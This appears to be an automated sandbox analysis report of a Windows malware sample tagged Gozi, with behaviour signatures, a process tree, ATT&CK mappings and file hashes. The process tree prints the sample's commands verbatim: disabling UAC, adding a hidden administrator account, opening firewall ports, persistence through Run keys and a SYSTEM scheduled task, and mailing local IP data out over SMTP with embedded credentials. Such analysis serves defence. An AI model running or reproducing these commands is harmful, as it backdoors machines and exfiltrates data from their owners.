Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
-
submitted
27/03/2025, 15:35
General
-
Target
JaffaCakes118_89dbe243829a1f6c79190897e3c8fbae.exe
-
Size
5.6MB
-
MD5
89dbe243829a1f6c79190897e3c8fbae
-
SHA1
b28d6881630e4ff0675cef42b55a910b3e1dd1c9
-
SHA256
59df1601a47511118c430b1961a05ed8000b73468dbbcaf06cd4048e8c7370c7
-
SHA512
13b639f23cc342718fe8d3f0930c7eaa64576cf6cd91e0db8555e799fa8d37fb08476631a8359021a53f38b04162f20081913186a5a20c5014f1226c0d8b99b8
-
SSDEEP
98304:GofZgqJrfcAmilwi/hMF5BdGTVNsUMDG5ACoRKqA4lsAS1J0lQW2AdYeBPZqV7fS:Hdl/lw8hMy5ORDG59pOHNF1ZcV7HHu9v
Malware Config
Extracted
gozi
Signatures
-
Gozi
Gozi is a well-known and widely distributed banking trojan.
-
Gozi family
-
UAC bypass 3 TTPs 1 IoCs
-
Boot or Logon Autostart Execution: Active Setup 2 TTPs 1 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 4 IoCs
-
Sets file to hidden 1 TTPs 3 IoCs
Modifies file attributes to stop it showing in Explorer etc.
-
Executes dropped EXE 13 IoCs
-
Loads dropped DLL 32 IoCs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in System32 directory 58 IoCs
-
Hide Artifacts: Hidden Users 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
UPX packed file 11 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in Windows directory 40 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Program crash 2 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 46 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
-
Modifies Internet Explorer settings 1 TTPs 42 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry class 5 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 4 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 34 IoCs
-
Suspicious use of SendNotifyMessage 22 IoCs
-
Suspicious use of SetWindowsHookEx 9 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_89dbe243829a1f6c79190897e3c8fbae.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_89dbe243829a1f6c79190897e3c8fbae.exe"1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\96B4.tmp\inst.cmd" "3⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\poc.exeC:\Users\Admin\AppData\Local\Temp\poc.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\poc.exeC:\Users\Admin\AppData\Local\Temp\poc.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=poc.exe&platform=0009&osver=5&isServer=0&shimver=4.0.30319.06⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2596 CREDAT:275457 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2596 CREDAT:275468 /prefetch:27⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v HelpAssistant /t REG_DWORD /d 0 /f4⤵
- Hide Artifacts: Hidden Users
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v "cam_server.exe" /t REG_SZ /d "C:\Windows\cam_server.exe pass=ganja1 port=57011" /f4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Windows/ip.exe"4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Windows/cam_server.exe"4⤵
- Sets file to hidden
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="RealIP" dir=in program="C:\Windows\realip.exe" security=notrequired action=allow4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Microsoft Outlook Express" dir=in program="C:\Windows\blat.exe" security=notrequired action=allow4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\cam_server.exe" "cam_server" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add portopening tcp 57011 all4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\net.exenet user HelpAssistant admin /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpAssistant admin /add5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet localgroup Çñ¼¿*¿ßΓα*Γ«αδ HelpAssistant /add4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Çñ¼¿*¿ßΓα*Γ«αδ HelpAssistant /add5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet user HelpAssistant /active:yes /comment:"ôτÑΓ**∩ º*»¿ß∞ ñ½∩ »αÑñ«ßΓ*ó½Ñ*¿∩ »«¼«Θ¿" /passwordchg:yes4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpAssistant /active:yes /comment:"ôτÑΓ**∩ º*»¿ß∞ ñ½∩ »αÑñ«ßΓ*ó½Ñ*¿∩ »«¼«Θ¿" /passwordchg:yes5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\net.exenet user HelpAssistant admin4⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user HelpAssistant admin5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\msupdate.msi" /qn /norestart4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\ip.exeC:\Users\Admin\AppData\Local\Temp\ip.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\ip.exeC:\Users\Admin\AppData\Local\Temp\ip.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\DCA9.tmp\ip.bat" "6⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\ipconfig.exeipconfig /all7⤵
- System Location Discovery: System Language Discovery
- Gathers network information
-
-
C:\Users\Admin\AppData\Local\Temp\DCA9.tmp\realip.exerealip.exe7⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\PING.EXEping -n 2 127.0.0.17⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Users\Admin\AppData\Local\Temp\DCA9.tmp\blat.exeblat.exe -install -server smtp.yandex.ru -port 25 -f [email protected] -u andriuhapetuhov -pw nehnah7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\DCA9.tmp\blat.exeblat.exe -to [email protected] -subject "Local IP" -attachi "localip.txt" -body "Locals IP"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 344 -s 3248⤵
- Loads dropped DLL
- Program crash
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping -n 5 127.0.0.14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\SysWOW64\attrib.exeattrib +S +H C:\Windows\system32\rserver304⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "security" /sc minute /mo 40 /ru "NT AUTHORITY\SYSTEM" /tr "C:\Windows/ip.exe /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\cam_server.execam_server.exe pass=ganja1 port=570114⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
C:\Windows\cam_server.exeC:\Windows\cam_server.exe5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1112 -s 1406⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\net.exenet stop rserver34⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop rserver35⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "DisplayName" /d "Microsoft Update Provide" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\reg.exereg add "HKLM\System\CurrentControlSet\Services\RServer3" /v "Description" /d "Update your Windows operation system and check corruption files" /f4⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\net.exenet start rserver34⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rserver35⤵
- System Location Discovery: System Language Discovery
-
-
-
-
-
C:\Windows\explorer.exeexplorer.exe1⤵
- Boot or Logon Autostart Execution: Active Setup
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\system32\msiexec.exeC:\Windows\system32\msiexec.exe /V1⤵
- Enumerates connected drives
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\syswow64\MsiExec.exeC:\Windows\syswow64\MsiExec.exe -Embedding ADC042E1C249761C4DB7A19FA05C34242⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
-
C:\Windows\system32\MsiExec.exeC:\Windows\system32\MsiExec.exe -Embedding 962999B1741715BB5451C0FC5F47F1E92⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe"C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe" /stop3⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\rserver30\rsetup64.exe"C:\Windows\SysWOW64\rserver30\rsetup64.exe" /intsetup3⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
-
-
C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe"C:\Users\Admin\AppData\Local\Temp\{3A8C4C87-D460-488A-A0AA-8993F6D355B1}\rsetup64.exe" /intuninstall3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
-
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{5f44532f-4717-76c4-1f20-6310a5970b53}\mirrorv3.inf" "9" "60bbf019f" "0000000000000590" "WinSta0\Default" "00000000000005C4" "208" "c:\windows\syswow64\rserver30"1⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DrvInst.exeDrvInst.exe "2" "211" "ROOT\DISPLAY\0000" "C:\Windows\INF\oem2.inf" "mirrorv3.inf:Mirror.Mfg.NTamd64:mirrorv3:3.1.0.0:radmin_mirror_v3" "60bbf019f" "0000000000000590" "00000000000005E0" "00000000000005E4"1⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Active Setup
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Scheduled Task/Job
1Scheduled Task
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Hide Artifacts
3Hidden Files and Directories
2Hidden Users
1Impair Defenses
2Disable or Modify System Firewall
1Disable or Modify Tools
1Modify Registry
5Discovery
Peripheral Device Discovery
1Permission Groups Discovery
1Local Groups
1Query Registry
2Remote System Discovery
1System Information Discovery
3System Location Discovery
1System Language Discovery
1System Network Configuration Discovery
1Internet Connection Discovery
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
579B
MD5f55da450a5fb287e1e0f0dcc965756ca
SHA17e04de896a3e666d00e687d33ffad93be83d349e
SHA25631ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA51219bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
Filesize
252B
MD5cd9877f4a51f638835ff2fe0c4ad67f8
SHA110fe74f1267e14d2c2951df722d157d3b6c59c3b
SHA256a94d38c58def432e97b4a6d7c5e7026aa36f643d798388dc6e5976b97adccabe
SHA51285a9a0c1a41d49c657bdd5802377a26192ebf30499375bb7251361fae403f9d09c7076b18f45d332b41bd8fb4e908a9dd537728259f3a2bd7338e05422441c8e
-
Filesize
344B
MD520fb5723fb5b76c081a01e6a4a8188c2
SHA169b36f9aaf48d64ee961132144a166f5a2569bc1
SHA2569d38008b2e7dc791e0baedb02351dcbcb0135d43f769aa3617ba52435fc31303
SHA512e5b0b7839692768a73bb754abcd6fb25d13dcadc159e363bc51987929a50a8730afb018c7adaef04cf7c3a4a212bb60b703efe57b68c109f98df7c00553a997d
-
Filesize
344B
MD5aedeee25db59f65a1423fe4d8db44574
SHA1eaa5d62c56819718da57a15e9206172eeb62c5e4
SHA2569477909e9ba97599ffeeb1128faf549369d677343dd778b6aba5c94f0fffcf60
SHA512b24f49e967dcfc9494d1565a7ac248081aff0db685f3ba1efa354019e6de34324c29a7663a98f183a07a419fa57542e17d3a655ed7cee2e917ea624b88241444
-
Filesize
344B
MD55d1e36affb41e7a2d8c5993327e3b794
SHA1f0c4a1b5920ca12bad0b6c49afc5a83f09d91ffc
SHA256c1f475e3e0549c8d162e5e705dcac32108f372dbd78e36ff389d8a5c94aa95f4
SHA512051c5cff7a78a5b8506ab772d91722a407eb49fc206e7933db7ca69d107cdfadc5a14b9b0685798eeaefe89a9187626a84ee8a4590eb457dcb2f5a778be7964f
-
Filesize
344B
MD51ca875a38a5b042b5917ce8104c4fcb9
SHA12bdd4e869eb507b3488cb7d528a42421a2f78e2e
SHA25605653067022afd74eb2cd5043ca6b923d252671ca6bfcf09ea6fa7c31b09a8f3
SHA512b89a40d54d4dfa6351e00bc0ae6350f3ccae35921873d67df8c9d9298ae77087333c02da0e91888bcd78a5be3074d46b7b918acdb6345c0eb94ae26f04f86ba6
-
Filesize
344B
MD5a20eb068539b94b554812bd852bd9878
SHA12f0971c3d7ea46939e1a77be8dd01a5c53ad9d4c
SHA25607b505df1da568e10881eb6f10365588ed6ae83dae7a8b32bdd154c948074322
SHA512dadf40ba03b0095711a475f01fa927b09333cd81fb5e2252db8cf175a36d3e155da14c4cd848a0f78aa733eae98c1bbff7a91b40e1206773a2b7e87ec01a2191
-
Filesize
344B
MD5bbf681f645ee0273ddc51b2b0fab43d0
SHA10ba5af5f81d0e0d2024c4a11f9a8ac69e1bcf0ba
SHA25669f0c00189db9df288d65ee7d6eb339b0b94b48d59161130103e44aea2af1292
SHA51217a70db49569a162f450768470569166dcb5de7d250b7d46b1c64c5638d037cdd6d64e8b3555d716b9b8043a479218331da9cb8493a947e295c769918f007905
-
Filesize
344B
MD53eb8eaec0d66ff5792e7ef7327c38fbb
SHA1b35fd302b8a3cc861d485289fede8ef26da704b4
SHA256c8646bc8ab9be03a723b60fdcc03ea2dce555998eafd0d80f8b4e6225a57a356
SHA5120d270f63202e45a0bbfb0c2d834725dff756cae741fab9822a413d924a3074f1a6d751c031962d28fb93e0795f89536840e44c115c69c7aea24fc0a548c7094a
-
Filesize
344B
MD5aa04a72e2c69c8f6ca070f9ba91c97d4
SHA11b19191401f8f6f7a8f0105adc9e97921cb64d6d
SHA2568601f54006606362fa6db62eec786707791a3f2264bacc51f55e89ed2aa9b4a9
SHA512398691369ca5fe4fd9e2f35b80a2cf796734067ea6c02fe6699c7c763442223fbdbf7b841f87650054c962bb3d54361b2019461a15eddcb200abe6b61ba3fb99
-
Filesize
344B
MD5ddab1a1e348300b8aa434f066d65f733
SHA143a367d6d1e283503bb87c931cf9df62ce9e86ba
SHA25684232c7beffa06b1b6eb47bb9dac053789f20de00815bbcef6c98abd8467426f
SHA512f54fcafb9349bac98a2d138a63b670a1405335c3bb1f2704007d3d1f2b204fff3c56c8b293595d21b72432f5ad61c6dfbb8f9752349491f49d81832584be1712
-
Filesize
344B
MD53db1281e81055a65c8a4c0fea903b465
SHA10c91a4da708b460e663f7a30b77dbbed072c65b8
SHA256043421c9da858833179dc2fa6f820742bdf492eea5f4678b66a88407d0716a79
SHA5122da47d76424cb597121d72dc30bfb1865658bb4eccb432e7f0509716a494608e395d043fc71265051711deacb5fc8b5f4ae5038e7b166c7d3d9cd6e8d01e45f5
-
Filesize
344B
MD596ff341804d85ea3e3ef88c89c7e5b69
SHA103e89609a0375e6a49a78892b584e780f20e150c
SHA256e66410ffd43f489e9c0bfe2f6e1dd7d1728b5c158780dd49a6787d2985783ee6
SHA512472053bc19f175e661e6c0f6f8ba0ed8e78b70a2a35f03d06b0c835eb575293d3294075c08f4c2e1a796119e8c778ef6ef2b519fbe1e6f6cb4ff1275e5343233
-
Filesize
344B
MD52938e4b9ddedd3aad699e26b9d1f4a57
SHA13a2b6572e4a4136d228ca90834c37316c49ffd0d
SHA2564053a7bbc57f25ae9e0f54d759e53ba6613354d6f01aa295576060937cadff72
SHA512d4c1a156051f5953cdda0c0951d275c17db26b90688c72a66d6b3192052c6ac5a299802d225d4704aac7acc7ccd9ff1b096bf91200e36cc83f794fb416dfdfeb
-
Filesize
344B
MD553c00a1ae015cda506337867ef14f8ae
SHA1b658aa5d2a7607725f97e1a5f55bc8808db20fea
SHA256bf8ef016c529e5fb3d663a82530ee22b7f571de6289301f4a756c2f4d591b8f4
SHA512bb938bbb12f7ebcb286d4d1cc748ef6d800709d9d4b979c972357d1e9dc973eb173371def45150d6a0b3538bfb00232c81df637bb446bcf5cdeadc4f6277104e
-
Filesize
344B
MD5c7b3118e49083b90d9925391cc0dd7a2
SHA1061af2ab6306d2eac6a0908bcc0210f1842cec93
SHA2566c791e4276ee515f734adb2c13cbf9bf8963b3b3a439f8015951f44442717f1a
SHA512bc4c2c7f797a7d6ad8854ca90236e68218c2354aa79c76c970035c7e3c8288119178c14c5647f6019cd67d83909c1161d77885bc9628066d00ccabecd0de66db
-
Filesize
344B
MD5422c83b2d15d598ff73d76b3ccafe35b
SHA13d66756d0b5cd4b9d76ddb0e50ed6bea47d72e51
SHA256ce31d55ab7f634586448ce80e7d67552164c9974de62c419f32705f16988c66c
SHA512c6c16f6be1d607bcc8ff654107c4f4faa0234bcd7d78e77f1f169b20bfed48bb3c3ba159cf5ccc66f450fcd51e6e2ddd9d8026f1c598de549af0a8373f930dac
-
Filesize
344B
MD52da7c173cef631352ff92541a4bf714e
SHA1f5310e23e53362490b0ee776a346395a4e54385c
SHA256ee74eaa1816e2b7ae098ced1118091038ceec7bcda1137fcfab1f748bf02eb46
SHA512c830592b011b5fa14cf4aaf557e8e1f13bb7680134ee2680bbf80329f3dec9130e145ac3f96e9130a63a1853c8efa90fb9186b200d001421caf6d1f598230190
-
Filesize
344B
MD5b932de7d05b1945162cf2dd8af7932bd
SHA13886c5c3ae82d13904ed668c240e099e3a0401a5
SHA2563d86b92166547698d55646833df23d106467a260790d87b7a52acfb94f24adb4
SHA512a5252a6c6c5a3bfd901fb82ab5f480ad7921393dc1398380835380abdb4a72a437be26b09335707175f659022ac80fbaf4a0a969d9e17141b9f3216c5424e43b
-
Filesize
344B
MD51c8e9cc6551079171c5ddd3e54d6dcff
SHA1e54b56183186ab80725ac13a44621db69ae2e5da
SHA256b8180dea1af75391939f911fdc5fd555f4084a069de52c2881688bb4edbcffbb
SHA512bcafa03aae3488d758ac09747e5d71dc7339709b3fec2bce7bc8896a8faa62f4a08abc700e6b061ab6185b759433d6152723c70e9bbc1ada6d842194834c2041
-
Filesize
344B
MD56fd1d8d2dd8bc96ad93c94364adf0362
SHA1818972ab0c907e637593657aa613fd36a9a6acfb
SHA25627a9992463c5849e3b8b9b4491ac565647219d719db711e7bb62d9df4925b0d1
SHA5128bf569e193bbebd31da5ce47c6a20f6b6f975c41e53b6808ad28d51e574eb1e4341b549d88e840afe0541f242d22d86c2ec7ecc08747275f936c7e52a1666ce1
-
Filesize
344B
MD5d09ae242b38c1a617f0c4198c081a698
SHA137ee94c549e8d126ff5965a00b3e5fd49153f9ba
SHA256204058e2ffdf1d98f668c37ee25be37122163c3622fbb4dc381efc5fe67b609e
SHA512f0a0abc21133e241f22d3f736c0d0acc1322bf9baada1457a6f23f6cdf54d239af572e3968a94f01a16e55724800100d495e8feca54225e3a68726bd5f8493c1
-
Filesize
344B
MD5259a5a403b670f93b80af201037b9f2b
SHA158e2b9fb42f8021b61e06621c2b9a77d3262c864
SHA25639979b7620214ad50d8c4ab0463856d8304ab885e4f45356176912b2573d81c9
SHA5123cb5a7031d079c0a7cab8c9c2d9b6c9b2905d6ef34d4b56ac7c16a9bd333d0273b4942179ad39c3c037bb5c9d1d0f57a573519067e5deab3f9984db6f02b2e9e
-
Filesize
344B
MD5148d7bbd32ed09911ae66060e7aac3c3
SHA1f601bac77423d513d6f19546fa11ea42c9e9c99c
SHA256ec6e493c06f7252613d50e51b6edfc5e9ccad8a26f70b439d60e0ced5e0624b7
SHA5124a163c457fd6f18e2f71c2b28ba950c229a607e70d9be629307a43ccc5132fb9a488c820ee3e4e5d95c415962cb30cdda658c8cb28627ecb6ece7a36e8a880cd
-
Filesize
344B
MD5e0c8047345d12c12e2505034567c8239
SHA1c1ba5edf9634ec020ed9cdbcd40b1238a2f284a8
SHA256003535b1ff97a92f431f5429d6f7a3526ff1128c457310443c0c17ce22da0f5a
SHA5128bb10a4641fb32113eddf5131f60ccc7a4a28ac61de82095bca49ddad5845b67459a8ccd354cf352a9f9b3f1f6701eaf8e6d0224d2d67488a1d70756266e5ece
-
Filesize
344B
MD5bfefbfb26650926f1dd1331eeb088cf1
SHA110337d7df29b1d06fc8e9240f643667d85244b2f
SHA256f981b32ca4e79577744fc901ccc2c3e4bf4b7d913e213d88a28970dc3e1ceb01
SHA512a160ac8ab71e701c15f520a334f330f5fc886a3621e5bc879204bd06db1d13cc230e8ba84f78ee21caa2fccd662a780c0f60b20a292fc72ba12e678b6b60f5ff
-
Filesize
344B
MD5bb12dea346d350e776052a2997746fba
SHA16a129d7aeb7ed57c0ce225e7e9da38814adebe6d
SHA256142a57e9b4b5a21619b67d062b6db996f1db7554916fbac325b53a06536a12cd
SHA5124e040f339183bbc1b0ee42d631150a7f95e98f18eaa723670873b787dadfeaa46dc7303e3188f3c6cb77264866b0784f83284ed4c4e5925bab159bc6e6a91cf9
-
Filesize
344B
MD55595154800ab09a6e2e16f73e5178bb8
SHA1872e09504a2824d916197160dc8a4fbf15a47f1e
SHA256bf3fbab1f45a4d6b93afd6419e82905841c3da689178533f5ca35eb5b58d24dc
SHA512d7b50fc473ab78356f07b539de23c3c2458d67d0d7d9978e6fd247adcca9df205bc28e060523cd4357c992a5a8b5b8377fdeeb1fde54f6fbeb8ce15c81c041ad
-
Filesize
344B
MD51907f5d5a374544ca7411eca1dc6c6a7
SHA1bada0858ffe80fe17366ce89f12b36968693ab70
SHA25676aaf1d669e3427be8e1523465a509973f58214ea7a4e5962d86167cc16c11e8
SHA512fbaf9b8e6646234dce6910b64f513eec1be94e5516862c0a448030cfc84e8be28ccdec6284e9904611a3c4b1d78d5189a62b18fb49ddca97fbae6496a5588017
-
Filesize
5KB
MD5d88b901a1d7e95c89120eb71f667d09f
SHA16e188b17134b8198de973f818760e7ef1258c3af
SHA256ac3d5756137371eb02dd989fc8fd541eee87dc6403f6ec392c57524ee3f81e23
SHA5129fcc2a114e3d4f730564113bd0f41f73dc62da2276bd782e941acd3b167cc0be56c4d49e9cd4d9c54d998e7bcdad6508cf87c37029ab49906213f6b8775e14f8
-
Filesize
2KB
MD566fa26ade0fe99831ddf10a0b3f5f70f
SHA18c4ffb8c64e7782c33b12fee5564df752ed46168
